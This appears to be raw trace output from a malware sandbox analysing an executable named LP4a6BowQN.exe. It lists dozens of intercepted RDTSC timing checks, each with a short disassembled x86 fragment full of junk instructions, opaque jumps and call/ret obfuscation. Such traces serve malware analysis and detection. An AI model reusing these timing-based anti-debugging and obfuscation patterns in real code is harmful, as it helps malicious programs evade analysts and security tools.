                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A25E27 second address: A25E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A25E34 second address: A25E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A25E38 second address: A25E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC8BCFEEF19h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A25E61 second address: A25E66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A265F9 second address: A2661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FC8BCFEEF19h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A2661A second address: A26636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07027h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A267BD second address: A267D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A267D1 second address: A267D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A2A456 second address: A2A45B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A2D3D6 second address: A2D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 99E35F second address: 99E36B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCFEEF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32BBD second address: A32BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A31B48 second address: A31B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Bh 0x00000007 jns 00007FC8BCFEEF0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8BCFEEF0Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A31B75 second address: A31B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A31B79 second address: A31B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32295 second address: A322A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8BCD0701Ah 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A322A4 second address: A322AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A323E1 second address: A323F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8BCD0701Dh 0x00000008 jg 00007FC8BCD07016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A323F9 second address: A32405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32405 second address: A3240B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A3240B second address: A32410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32556 second address: A32570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07025h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32570 second address: A32575 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A32575 second address: A325BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a pop ebx 0x0000000b jo 00007FC8BCD07022h 0x00000011 jc 00007FC8BCD07016h 0x00000017 jc 00007FC8BCD07016h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007FC8BCD07039h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A325BF second address: A325C9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A35FCF second address: A35FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07028h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC8BCD0701Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9E9ACB second address: 9D19AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCFEEF0Ch 0x00000008 jnp 00007FC8BCFEEF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3877h], edx 0x00000017 mov dl, 1Ah 0x00000019 lea eax, dword ptr [ebp+124857EDh] 0x0000001f mov dword ptr [ebp+122D2600h], eax 0x00000025 push eax 0x00000026 jmp 00007FC8BCFEEF11h 0x0000002b mov dword ptr [esp], eax 0x0000002e mov edx, esi 0x00000030 call dword ptr [ebp+12455F97h] 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9E9BE1 second address: 9E9BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9E9FCB second address: 837D6A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCFEEF15h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push dword ptr [ebp+122D098Dh] 0x00000011 mov ecx, dword ptr [ebp+122D3A22h] 0x00000017 call dword ptr [ebp+122D2CC2h] 0x0000001d pushad 0x0000001e jne 00007FC8BCFEEF2Bh 0x00000024 xor eax, eax 0x00000026 pushad 0x00000027 mov eax, dword ptr [ebp+122D3A82h] 0x0000002d jg 00007FC8BCFEEF0Bh 0x00000033 sub dx, 13D1h 0x00000038 popad 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d pushad 0x0000003e mov ax, si 0x00000041 movzx esi, cx 0x00000044 popad 0x00000045 jmp 00007FC8BCFEEF12h 0x0000004a mov dword ptr [ebp+122D3BE2h], eax 0x00000050 cmc 0x00000051 pushad 0x00000052 mov esi, ecx 0x00000054 mov dword ptr [ebp+122D3070h], eax 0x0000005a popad 0x0000005b mov esi, 0000003Ch 0x00000060 jg 00007FC8BCFEEF0Dh 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a sub dword ptr [ebp+122D20B9h], ebx 0x00000070 lodsw 0x00000072 sub dword ptr [ebp+122D2034h], ebx 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007FC8BCFEEF14h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D1C62h], esi 0x0000008b push eax 0x0000008c jnp 00007FC8BCFEEF14h 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 popad 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA05A second address: 9EA05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA05E second address: 9EA0A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FC8BCFEEF06h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 jno 00007FC8BCFEEF1Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FC8BCFEEF06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA173 second address: 9EA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA278 second address: 9EA27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA343 second address: 9EA371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp], esi 0x0000000b ja 00007FC8BCD07022h 0x00000011 add dword ptr [ebp+124675D2h], edi 0x00000017 nop 0x00000018 push ebx 0x00000019 pushad 0x0000001a jng 00007FC8BCD07016h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA371 second address: 9EA382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC8BCFEEF08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA382 second address: 9EA388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA49E second address: 9EA4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA4A2 second address: 9EA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EA587 second address: 9EA591 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAA34 second address: 9EAA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAA38 second address: 9EAA48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAA48 second address: 9EAA53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC8BCD07016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAA53 second address: 9EAAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, ax 0x0000000d jng 00007FC8BCFEEF0Ch 0x00000013 push 0000001Eh 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC8BCFEEF08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D230Eh], ecx 0x00000035 nop 0x00000036 jnp 00007FC8BCFEEF0Eh 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAE83 second address: 9EAF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FC8BCD07018h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000019h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f call 00007FC8BCD0701Dh 0x00000024 push eax 0x00000025 or dword ptr [ebp+122D20ADh], esi 0x0000002b pop edx 0x0000002c pop edx 0x0000002d pushad 0x0000002e mov eax, 356DE1EDh 0x00000033 pushad 0x00000034 xor dword ptr [ebp+122D3840h], ebx 0x0000003a popad 0x0000003b popad 0x0000003c clc 0x0000003d lea eax, dword ptr [ebp+12485831h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FC8BCD07018h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d clc 0x0000005e mov dword ptr [ebp+122D2D03h], ecx 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FC8BCD0701Eh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAF13 second address: 9EAF19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAF19 second address: 9EAF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD0701Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAF2C second address: 9EAF8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jbe 00007FC8BCFEEF1Ch 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 pop eax 0x00000016 nop 0x00000017 mov ecx, esi 0x00000019 lea eax, dword ptr [ebp+124857EDh] 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC8BCFEEF08h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov ecx, ebx 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jne 00007FC8BCFEEF08h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAF8A second address: 9EAF94 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD0701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9EAF94 second address: 9D258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC8BCFEEF19h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC8BCFEEF08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D2B61h], esi 0x0000002d call dword ptr [ebp+1245CFA1h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC8BCFEEF19h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36288 second address: A3629A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC8BCD07018h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A3629A second address: A362B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A362B9 second address: A362CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC8BCD07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC8BCD07016h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A362CF second address: A362D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A362D3 second address: A362DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36A0E second address: A36A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36A17 second address: A36A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36A20 second address: A36A3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FC8BCFEEF0Ch 0x00000010 jp 00007FC8BCFEEF06h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36A3A second address: A36A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36A3E second address: A36A48 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36B8C second address: A36B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36B91 second address: A36BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8BCFEEF15h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36BAD second address: A36BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8BCD07016h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36BBB second address: A36BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8BCFEEF10h 0x0000000e jnc 00007FC8BCFEEF08h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36D62 second address: A36D8A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCD07016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FC8BCD07028h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36D8A second address: A36D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A36D8E second address: A36D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A39EDD second address: A39EEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A39EEC second address: A39EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A39EF7 second address: A39EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A39EFB second address: A39F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9A175C second address: 9A1760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9A1760 second address: 9A1773 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FC8BCD07016h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9A6919 second address: 9A691D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9A691D second address: 9A693D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FC8BCD0702Ah 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FC8BCD07016h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A42F56 second address: A42F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 ja 00007FC8BCFEEF2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A430AD second address: A430C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC8BCD0701Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A430C6 second address: A430CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A430CA second address: A430F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC8BCD07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD07026h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC8BCD07016h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A43218 second address: A4321E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
